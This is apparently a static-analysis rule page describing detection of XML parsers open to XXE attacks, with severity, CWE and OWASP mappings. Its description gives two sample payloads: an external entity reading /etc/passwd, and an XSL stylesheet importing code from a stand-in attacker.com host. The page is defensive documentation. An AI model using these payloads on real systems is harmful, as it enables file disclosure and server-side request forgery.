Uploaded image for project: 'Rules Repository'
  1. Rules Repository
  2. RSPEC-2755

XML parsers should not be vulnerable to XXE attacks

    Details

    • Type: Vulnerability Detection
    • Status: Active
    • Resolution: Unresolved
    • Labels:
    • Message:
      Disable access to external entities in XML parsing.
    • Highlighting:
      Hide

      Java: Instantiation of the XMLInputFactory or SAXParserFactory or XMLReader or DocumentBuilderFactory object

      Show
      Java: Instantiation of the XMLInputFactory or SAXParserFactory or XMLReader or DocumentBuilderFactory object
    • Default Severity:
      Blocker
    • Impact:
      High
    • Likelihood:
      High
    • Default Quality Profiles:
      Sonar way
    • Targeted languages:
      C++, JavaScript, PHP, TypeScript
    • Covered Languages:
      C#, C, Java, Python
    • Remediation Function:
      Constant/Issue
    • Constant Cost:
      15min
    • Analysis Level:
      Semantic Analysis
    • Analysis Scope:
      Main Sources
    • Implementation details:
    • Common Rule:
      Yes
    • CWE:
      CWE-611, CWE-827
    • OWASP:
      A4
    • FindSecBugs:
      XXE_XMLSTREAMREADER, XXE_SAXPARSER, XXE_XMLREADER, XXE_DOCUMENT, XXE_DTD_TRANSFORM_FACTORY, XXE_XSLT_TRANSFORM_FACTORY
    • MSFT Roslyn:
      CA3075

      Description

      XML specification allows the use of entities that can be internal or external (file system / network access ...) which could lead to vulnerabilities such as confidential file disclosures or SSRFs.

      Example in this XML document, an external entity read the /etc/passwd file:

      <?xml version="1.0" encoding="utf-8"?>
        <!DOCTYPE test [
          <!ENTITY xxe SYSTEM "file:///etc/passwd">
        ]>
      <note xmlns="http://www.w3schools.com" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">
        <to>&xxe;</to>  
        <from>Jani</from>
        <heading>Reminder</heading>
        <body>Don't forget me this weekend!</body>
      </note>
      

      In this XSL document, network access is allowed which can lead to SSRF vulnerabilities:

      <?xml version="1.0" encoding="UTF-8"?>
      <xsl:stylesheet version="1.0" xmlns:xsl="http://www.attacker.com/evil.xsl">
        <xsl:import href="http://www.attacker.com/evil.xsl"/>
        <xsl:include href="http://www.attacker.com/evil.xsl"/>
       <xsl:template match="/">
        &content;
       </xsl:template>
      </xsl:stylesheet> 
      

      It is recommended to disable access to external entities and network access in general.

      See

        Attachments

          Issue Links

          1.
          C# RSPEC-5656 Language-Specification Active Unassigned
          2.
          Java RSPEC-2756 Language-Specification Active Unassigned
          3.
          Python RSPEC-5635 Language-Specification Active Unassigned
          4.
          PHP RSPEC-5640 Language-Specification Active Unassigned
          5.
          JavaScript RSPEC-5657 Language-Specification Active Unassigned
          6.
          C-Family RSPEC-5684 Language-Specification Active Unassigned

            Activity

              People

              • Assignee:
                Unassigned
                Reporter:
                ann.campbell.2 Ann Campbell
              • Votes:
                0 Vote for this issue
                Watchers:
                3 Start watching this issue

                Dates

                • Created:
                  Updated: